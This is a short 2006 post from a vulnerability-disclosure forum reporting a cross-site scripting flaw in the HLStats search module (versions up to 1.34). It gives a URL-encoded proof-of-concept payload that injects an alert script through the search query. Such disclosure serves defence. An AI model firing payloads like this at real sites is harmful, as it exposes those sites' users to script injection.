Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
XSS in HLStats <= 1.34
Posted by: kefka
Date: August 29, 2006 05:31PM

Cross-site Scripting Vulnerability in HLStats <= 1.34

hlstats.php?mode=search&game=cstrike&st=player&q=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E%22

Search module fails to sanitize quotes.

kefka
kefka@kevinbeardsucks.com

Thanks RSnake

Options: ReplyQuote


Sorry, only registered users may post in this forum.